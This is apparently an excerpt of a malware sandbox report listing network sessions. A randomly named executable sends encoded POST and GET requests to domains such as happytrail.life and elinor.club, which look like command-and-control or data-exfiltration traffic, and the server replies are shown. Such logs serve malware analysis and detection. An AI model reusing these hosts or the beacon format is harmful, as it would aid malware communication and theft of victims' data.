                                                        Data Ascii: 0lTTc=msZ4rMLyjYtOTZ3POcLrHuWH0bLVUt8U8MBbDmv8Sx0Qw6iljpEbBd6NvsREiIF2E760U9KOGOUYLIbP06YqO/17Xlf9T9VMJr13yke17vi6hIW26memmSU9eSvPnPLorxvSOluJ61EEim/HWnC9pmkuZpLLisjdrc0CbSJzh6nIoHoxaomFzQORNDPVeamp1Zee3BCR++S3nF3j2djiRD2U4MjCuurBmOxKxO43ZpC9S+cw64VIDBuzXZ4I0KzJAsw1iHS9hGfS77phjmu/3ADJW2oB+ChF1AzlQ2qSnN3dI97SaYCBRBY9dHlume5BTF5uX/vY7p0DtYn3T5/7B6rnL/7vL5U+jXtbZ/qkHs8F0RYvn4vgcwcLG3I/K+tudlnmPlRBnmeBJPJ4ixcc5/pyKpCUlrCfrSgwa1YDqDFbDEqnMA4Ej1v/GymkHUwG6FK/5yAwa7PRnI0f/XWBItc0TgpK7OO3WsbiiXuhx/kFVLebik3idrD8wKYzgHi1CrLZVJaVR88q9HNJYlVwDyKZ1vfWf3dXeOec3wRUt3XDNNPHDmWyJNcPi1PScIYD0a3yBFT8D9ia4p5dB1wlzSOZPbnEux4UTtlEiZcFfHsct3M9sjiuO8VRkwASccOkpTM4z/AdaXtQOuebcVerifw1Cisj6NnD23FKDzFF7xrZXjYf0SEQNXTySoiTwn8pT6OTrR6rYh3dTwo7Q1hxz0LRZapGB3z/LqDW5zf/RPNg/axuejMz7mdXM3JH06aHVtXRrUqOqVp2alTvFu+M52CoNmWpySHTnKSzj+o2VmQog1D5WPCKuGQvi4yIFfW8cOxDw6Z6e88T+Et2i2j2sUOdxXwptKedzvlc68wR14yhI9VfF+TV1zBd5bTdXFqkv7jW0EMapSmdV7nTZfM15XkhIERx2EzOKSi8fW2wXRbapUyf5oa85iQHE80p3ws4yuv/6ovsse3d60pRgf+/8nn4Hg7oQ8UsfqWD6kUejczdgW [TRUNCATED]
                                                        Jan 11, 2025 02:54:02.756947994 CET341INHTTP/1.1 302 Moved Temporarily
                                                        Server: nginx
                                                        Date: Sat, 11 Jan 2025 01:54:02 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Location: http://elinor.club/izuw/
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.1049975194.58.112.174806248C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 11, 2025 02:54:04.613801956 CET394OUTGET /izuw/?0lTTc=ruxYo8C32atpYpzQJOvfIcCXiNL6eNxgwckfL1b1c00g4qOjwbRrLMaH3ssm+flPD5WyKdSxTfkwNo2dzo97fPlXeEr6R7cbNLZe3XLx3tq+hpeLpA==&LR=KBvPk HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.elinor.club
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                                                        Jan 11, 2025 02:54:05.302099943 CET473INHTTP/1.1 302 Moved Temporarily
                                                        Server: nginx
                                                        Date: Sat, 11 Jan 2025 01:54:05 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Location: http://elinor.club/izuw/?0lTTc=ruxYo8C32atpYpzQJOvfIcCXiNL6eNxgwckfL1b1c00g4qOjwbRrLMaH3ssm+flPD5WyKdSxTfkwNo2dzo97fPlXeEr6R7cbNLZe3XLx3tq+hpeLpA==&LR=KBvPk
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.1049976199.192.23.123806248C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 11, 2025 02:54:10.352336884 CET668OUTPOST /kbdb/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.happytrail.life
                                                        Origin: http://www.happytrail.life
                                                        Referer: http://www.happytrail.life/kbdb/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 194
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                                                        Data Raw: 30 6c 54 54 63 3d 34 76 36 6f 61 33 42 6b 70 77 43 4d 72 71 4e 5a 58 51 32 4e 31 5a 52 4a 4c 78 64 68 74 7a 6c 42 68 56 6a 77 2b 34 35 71 6d 56 49 4b 67 6c 37 56 4c 36 53 76 45 30 54 44 75 48 4a 77 76 72 57 49 4a 57 4d 59 31 48 37 35 53 36 56 65 35 51 52 54 75 67 66 78 6c 37 70 36 59 6c 5a 55 63 65 6b 58 52 67 57 32 72 30 55 39 4c 31 58 4d 30 47 77 37 46 38 6c 35 75 70 64 6b 4f 50 63 74 49 69 32 37 43 64 45 43 66 62 41 2b 37 54 44 62 62 75 5a 4f 50 6d 4c 49 32 36 37 4f 41 38 53 31 6b 6a 50 77 47 38 75 45 48 42 48 58 4b 6f 48 64 74 70 4c 67 45 64 47 30 59 71 7a 41 39 47 7a 7a
                                                        Data Ascii: 0lTTc=4v6oa3BkpwCMrqNZXQ2N1ZRJLxdhtzlBhVjw+45qmVIKgl7VL6SvE0TDuHJwvrWIJWMY1H75S6Ve5QRTugfxl7p6YlZUcekXRgW2r0U9L1XM0Gw7F8l5updkOPctIi27CdECfbA+7TDbbuZOPmLI267OA8S1kjPwG8uEHBHXKoHdtpLgEdG0YqzA9Gzz
                                                        Jan 11, 2025 02:54:10.942410946 CET533INHTTP/1.1 404 Not Found
                                                        Date: Sat, 11 Jan 2025 01:54:10 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.1049977199.192.23.123806248C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 11, 2025 02:54:12.898633957 CET692OUTPOST /kbdb/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.happytrail.life
                                                        Origin: http://www.happytrail.life
                                                        Referer: http://www.happytrail.life/kbdb/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 218
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                                                        Data Raw: 30 6c 54 54 63 3d 34 76 36 6f 61 33 42 6b 70 77 43 4d 71 4c 39 5a 51 33 71 4e 77 35 52 4b 48 52 64 68 30 6a 6c 46 68 55 66 77 2b 36 56 36 6e 6a 59 4b 67 41 48 56 4b 37 53 76 48 30 54 44 32 58 4a 35 69 4c 57 50 4a 57 77 51 31 47 58 35 53 37 78 65 35 52 68 54 75 54 6e 75 6c 72 70 34 58 46 5a 73 52 2b 6b 58 52 67 57 32 72 30 77 48 4c 31 2f 4d 31 32 41 37 45 64 6c 2b 31 4a 64 6e 48 76 63 74 4d 69 32 2f 43 64 46 74 66 61 4d 55 37 52 37 62 62 76 70 4f 4f 33 4c 50 34 36 36 48 64 4d 54 51 72 57 53 6f 4a 70 4f 35 47 78 66 4d 61 36 6a 62 71 49 32 6e 56 4d 6e 6a 4c 64 76 4f 7a 41 47 5a 4b 32 76 4b 53 6f 34 41 74 51 6d 74 67 67 6c 39 45 6a 63 34 33 67 3d 3d
                                                        Data Ascii: 0lTTc=4v6oa3BkpwCMqL9ZQ3qNw5RKHRdh0jlFhUfw+6V6njYKgAHVK7SvH0TD2XJ5iLWPJWwQ1GX5S7xe5RhTuTnulrp4XFZsR+kXRgW2r0wHL1/M12A7Edl+1JdnHvctMi2/CdFtfaMU7R7bbvpOO3LP466HdMTQrWSoJpO5GxfMa6jbqI2nVMnjLdvOzAGZK2vKSo4AtQmtggl9Ejc43g==
                                                        Jan 11, 2025 02:54:13.473365068 CET533INHTTP/1.1 404 Not Found
                                                        Date: Sat, 11 Jan 2025 01:54:13 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.1049978199.192.23.123806248C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 11, 2025 02:54:15.537826061 CET1705OUTPOST /kbdb/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.happytrail.life
                                                        Origin: http://www.happytrail.life
                                                        Referer: http://www.happytrail.life/kbdb/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1230
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                                                        Data Raw: 30 6c 54 54 63 3d 34 76 36 6f 61 33 42 6b 70 77 43 4d 71 4c 39 5a 51 33 71 4e 77 35 52 4b 48 52 64 68 30 6a 6c 46 68 55 66 77 2b 36 56 36 6e 6a 51 4b 67 79 66 56 4c 59 36 76 47 30 54 44 36 33 4a 30 69 4c 57 53 4a 57 59 55 31 47 4c 70 53 35 35 65 35 7a 70 54 35 32 4c 75 75 72 70 34 56 46 5a 58 63 65 6b 47 52 67 47 74 72 30 41 48 4c 31 2f 4d 31 30 6f 37 55 38 6c 2b 33 4a 64 6b 4f 50 63 68 49 69 32 48 43 63 73 61 66 61 59 75 37 68 62 62 62 50 35 4f 4d 46 7a 50 6e 4b 36 46 65 4d 54 79 72 57 57 4a 4a 70 36 44 47 79 43 5a 61 34 44 62 6f 64 48 47 45 65 58 4c 65 63 48 47 7a 47 53 35 59 79 50 68 51 37 35 47 37 7a 6d 6e 30 6b 67 70 42 6a 51 32 70 68 50 79 4a 33 50 52 57 37 34 79 4f 44 4f 79 32 4b 41 67 64 72 79 32 52 63 43 4f 67 42 6c 6e 73 71 4a 72 56 32 69 45 34 56 51 39 4f 61 54 31 5a 70 34 79 5a 65 30 66 56 62 63 79 4e 39 71 70 35 4f 34 2b 43 41 74 67 55 4f 50 70 74 72 34 36 4a 61 43 73 42 6d 63 62 65 45 43 4c 63 68 52 52 4a 64 7a 6a 32 51 6a 78 68 6f 52 38 41 62 64 79 48 30 37 4b 65 44 2f 77 36 45 4c 31 [TRUNCATED]
                                                        Data Ascii: 0lTTc=4v6oa3BkpwCMqL9ZQ3qNw5RKHRdh0jlFhUfw+6V6njQKgyfVLY6vG0TD63J0iLWSJWYU1GLpS55e5zpT52Luurp4VFZXcekGRgGtr0AHL1/M10o7U8l+3JdkOPchIi2HCcsafaYu7hbbbP5OMFzPnK6FeMTyrWWJJp6DGyCZa4DbodHGEeXLecHGzGS5YyPhQ75G7zmn0kgpBjQ2phPyJ3PRW74yODOy2KAgdry2RcCOgBlnsqJrV2iE4VQ9OaT1Zp4yZe0fVbcyN9qp5O4+CAtgUOPptr46JaCsBmcbeECLchRRJdzj2QjxhoR8AbdyH07KeD/w6EL1525Hw6xSk07SPvW6kiHabpPBrFwABm9gSwH13xnj0vgEY0EdhG0GBouQ8FXix4dmLUbxiumZeAFXT+7Va3/1NXsWEHBHXfKyJnfq4Gq+5gaCE8DCT7P+86BfLpkwOG5pfQ+leR936UFGXlzPBal7kPY9KElm40KsHXz21DJXnoVUyW0aNMTBp3LVvoi57/QBjXExdSW5SjGNRo7rO+w2X/g+b9X6VRn9G1wzv3iaAKstSZSCj3mEylnT9xFwZajxvlphBFVuojO5yQsUjbR6S7jr9LiyMC8WhGiJhxdHu28OMHEJtJKpMHlvGjwKVZo7Tjh4IK4vuBI5nAEXGHHREZ+pYOXd0HIEaXMk0P4u5viJRt80TAKBqh4ZaKO9wz9I3s3SG2/CAkfwVK9B3dknDP6GNA60LSI7hGvTltxBCT2+iBrttp78gN2kDrzHc5cNSBFrETgDWsJkT7DMnF6kYngnt7KpEEZbp21jkxqT8b8JKkgsFSBxfTnx9qeasmQRkpyUMTC6mHT816RThsCC6A9WREKYPNozSNGdbU9GyldB2eRPC7jCIePPhV8H5HUkovF2WCiyZKwrJeH/O81T9zIAczRlI1uQZuj+d/udfKb2Ddl0gpzvgHsaYoqjMdld91hqzb/bt6wHvtu1brNgbGUCtMdoVjEFJk [TRUNCATED]
                                                        Jan 11, 2025 02:54:16.082485914 CET533INHTTP/1.1 404 Not Found
                                                        Date: Sat, 11 Jan 2025 01:54:15 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.1049979199.192.23.123806248C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 11, 2025 02:54:18.151704073 CET398OUTGET /kbdb/?0lTTc=1tSIZCMizzCWiaBRWQGky41xM3BT5gdalGybiYpqvDYVvQaidb2ENkfsty8txqySZEM8rWjWTLVwzzYipQr6s5YuXW5OAcplfRP5h3UAJn3wyHALXA==&LR=KBvPk HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.happytrail.life
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                                                        Jan 11, 2025 02:54:18.703166008 CET548INHTTP/1.1 404 Not Found
                                                        Date: Sat, 11 Jan 2025 01:54:18 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.104998066.29.146.78806248C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 11, 2025 02:54:23.766625881 CET677OUTPOST /01kd/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.spinpinang01.click
                                                        Origin: http://www.spinpinang01.click
                                                        Referer: http://www.spinpinang01.click/01kd/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 194
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                                                        Data Raw: 30 6c 54 54 63 3d 4d 79 31 57 4e 6f 53 46 62 6a 47 47 54 6c 4a 59 6f 67 61 74 70 51 78 4c 6e 2b 69 67 79 55 49 6e 6e 62 48 43 36 32 35 4f 2b 64 30 48 47 42 2b 37 46 35 64 4d 2b 50 6a 62 35 69 41 64 2f 4a 48 7a 4e 61 7a 5a 6e 57 37 32 54 66 58 55 38 47 41 58 6a 45 46 2f 4c 34 6f 4e 64 45 36 46 6d 69 31 43 69 79 51 34 72 72 37 5a 35 69 61 75 54 75 6a 39 53 71 32 6a 31 62 75 65 4c 73 79 52 61 57 71 6b 39 43 76 59 57 4a 4d 55 7a 6d 2f 68 6c 37 4e 51 35 41 2b 58 46 70 43 6e 55 42 6b 65 57 6a 71 4c 76 79 4c 71 35 30 64 32 77 4a 45 53 46 69 4a 69 6d 31 41 57 65 31 46 39 7a 5a 66 6a
                                                        Data Ascii: 0lTTc=My1WNoSFbjGGTlJYogatpQxLn+igyUInnbHC625O+d0HGB+7F5dM+Pjb5iAd/JHzNazZnW72TfXU8GAXjEF/L4oNdE6Fmi1CiyQ4rr7Z5iauTuj9Sq2j1bueLsyRaWqk9CvYWJMUzm/hl7NQ5A+XFpCnUBkeWjqLvyLq50d2wJESFiJim1AWe1F9zZfj
                                                        Jan 11, 2025 02:54:24.351911068 CET1236INHTTP/1.1 404 Not Found
                                                        keep-alive: timeout=5, max=100
                                                        content-type: text/html
                                                        transfer-encoding: chunked
                                                        content-encoding: gzip
                                                        vary: Accept-Encoding
                                                        date: Sat, 11 Jan 2025 01:54:24 GMT
                                                        server: LiteSpeed
                                                        x-turbo-charged-by: LiteSpeed
                                                        connection: close
                                                        Data Raw: 31 33 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a dc 24 a8 95 7a 17 17 01 90 04 08 80 04 49 d0 e1 98 00 71 13 27 71 93 1b 7e 20 bf 86 9f cc 05 4a 6a 51 6c 69 ba d7 e1 1f ae 99 08 11 75 64 65 65 7e 99 59 9d 59 bf fd f6 db e3 3f 71 0b 76 65 aa fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e5 7c fb ed f2 33 71 2b 0b cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e ac a2 74 ab a7 ba f2 ee a9 bb 4f e9 58 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 b5 b0 fc c4 fa 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d b5 12 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8a ef 4b db 8a dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 4a 56 0d 26 59 9d 3a 8f f0 73 e7 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 fb cc 39 0d fe 7e 99 da 7f f6 cd 03 d2 b9 f7 ac 24 8c 4f 0f 03 ba 00 db 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 5c 56 86 67 f7 61 80 12 79 f7 [TRUNCATED]
                                                        Data Ascii: 1350ZrHr?OAa{7j$zIq'q~ JjQliudee~YY?qve o=|3q+{XV)w]vtOXv,"fv?BGV]nyyG=6jZ:UMh/0K'wRUX7!JV&Y:s(^n/^9~$O~nUh[_[_~\Vgay~0S>pC?WJ`E8+]icpXn9N*0}/]8zV<cbgvNLdU~Y?}"x;W<KK>Lre/meeUu7/yV? G*yg*"Sw{f"!=z`@\Wh-yFgj]#C:rw$aG?Rh}VUY0x;l/+,+I+^kga\[NFa>Aev]~>l?Z+=$7~#EF7--L/>eu+=SwU+g^Wo<[^{;\4ml[zc7/hK13;0[5~?u{>/q)z9^GYF"?V'KA{dK71>j#W{}>Lns=C 8.#m\u~p^
